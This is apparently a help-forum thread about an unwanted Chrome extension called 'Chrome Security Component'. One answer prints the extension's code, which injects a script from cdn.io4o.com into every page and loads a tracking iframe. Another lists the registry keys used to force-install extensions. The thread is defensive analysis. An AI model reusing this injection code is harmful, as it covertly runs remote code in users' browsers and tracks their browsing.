6

Upon launching Google Chrome a little pop up dialogue box appears in the top right hand corner of the browser which states:

Confirm Changes

The extension "Chrome Security Component" has been added.

It gives me the options to press OK or Details (I have not pressed OK), but upon pressing Details a new tab opens with my Chrome extensions.

There is an extension called Chrome Security Component 1.0 with a tick enabled to the right.

The writing immediately below its name says:

Critical Security Update for Firefox

There are 2 little boxes:

  • Allow incognito
  • Allow access to URLs

Neither boxes are ticked.

To my knowledge I have not downloaded this extension from Chrome Web Store and would like advice?

Has anyone else come across this, it doesn't sound right especially the bit about it being a critical security update for Firefox!

Can Google Chrome add extensions automatically if they are for security reasons?

(This is also something that has appeared very recently in the last few times of launching Chrome, that's why I am sure I didn't download it as an extension)

enter image description here

Improve this question
4
  • which version of windows are you using?
    – Sathyajith Bhat
    Commented Dec 5, 2012 at 19:44
  • Windows 7 64bit home premium
    – Simon
    Commented Dec 5, 2012 at 19:45
  • i use NIS 2013, Malwarebytes antimalware as my main antivirus arsenal
    – Simon
    Commented Dec 5, 2012 at 19:47
  • If it was legit, other Chrome users would have surely had the same extension added and pop up message ?
    – Simon
    Commented Dec 5, 2012 at 20:20

3 Answers 3

Reset to default
2

The extension is not available the Chrome web store, and looking at the generic Chrome plugin icon, along with the lack of presence in the webstore makes me believe that this is definitely not legit.

You should be able to check the Extension source code from %localappdata%\Google Chrome\User Data\Default\Extensions\kfejhbidgehdoaglokpfddkmiepmhcck folder and examine what it does.

Can Google Chrome add extensions automatically if they are for security reasons?

I have seen external apps install extensions for Chrome(example would be Norton 360 which installs it's useless Protect extension) but this is definitely not from Mozilla.

Improve this answer
17
  • Can I disable it ?
    – Simon
    Commented Dec 5, 2012 at 19:50
  • Also the way it says its a critical update for firefox (it has nothing to do with firefox) !
    – Simon
    Commented Dec 5, 2012 at 19:51
  • bit confused how to check source code given in answer above
    – Simon
    Commented Dec 5, 2012 at 20:40
  • @Simon goto the path mentioned above, check the manifest.js, and other js/html files. You can/should disable/remove it
    – Sathyajith Bhat
    Commented Dec 6, 2012 at 7:33
  • I was having difficulty, locating the path, how do i get to %localappdata% ? I notice there is a bin next to the extension in the screenshot - where i can remove/delete it from there (hopefully)?
    – Simon
    Commented Dec 6, 2012 at 9:23
2

this is a bit more info for this extension:

Chrome Security Component


--------------------------------------
extension background.js
--------------
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo) {
    if (changeInfo.status === 'complete') {
        chrome.tabs.executeScript(tabId, {
            code: "var d = document; var js, id = 'wsk-node'; if (d.getElementById(id)) {return;}"+
                  "js = d.createElement('script'); js.id = id; js.async = true;"+
                  "js.src = '//cdn.io4o.com/js/all.js';"+
                  "d.getElementsByTagName('head')[0].appendChild(js);"
        });
    }
});


-----
//cdn.io4o.com/js/all.js
----

var host = window.location.host;

if (host != 'cdn.io4o.com') {
        var iframe = document.createElement('iframe');
        iframe.src = '//cdn.io4o.com/ga.html';
        iframe.style.width = 0;
        iframe.style.height = 0;
        iframe.style.border = 0;
        document.body.appendChild(iframe);
}

------
//cdn.io4o.com/ga.html
------

<html>
<head>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-37051120-1']);
  _gaq.push(['_setDomainName', 'io4o.com']);

  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>
<body>
</body>
</html>
Improve this answer
5
  • Thx for that Federico, but do u know what it means ?
    – Simon
    Commented Dec 20, 2012 at 22:41
  • Hi Simon, it uses google analytics to track web pages. developers.google.com/analytics/devguides/collection/gajs
    – Federico Botta
    Commented Dec 21, 2012 at 9:55
  • Oh right, I ended up removing it, but was it potentially harmful or not really ?
    – Simon
    Commented Dec 21, 2012 at 10:22
  • Not really as it's current state, but it tracks all visited web sites, unless they change remote code for js and html (//cdn.io4o.com/js/all.js and //cdn.io4o.com/ga.html). Personally, I suggest to remove it, as you did ;-)
    – Federico Botta
    Commented Dec 21, 2012 at 11:55
  • Thx for your feedback
    – Simon
    Commented Dec 21, 2012 at 11:59
0

Can Google Chrome add extensions automatically if they are for security reasons?

Yes, Google Chrome permits automatic extension installation but that is not restricted to security reasons. What you have experienced is a so-called external extension.
From Google Developer website

An extension that's installed automatically is known as an external extension. Google Chrome supports two ways of installing external extensions:

Using a preferences JSON file (Mac OS X and Linux only)
Using the Windows registry (Windows only)

On Windows they are slipped through via these registry entries:

32-bit Windows: HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extensions
64-bit Windows: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Google\Chrome\Extensions

Just delete the offending extension id (it will appear as a subkey)

Improve this answer

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .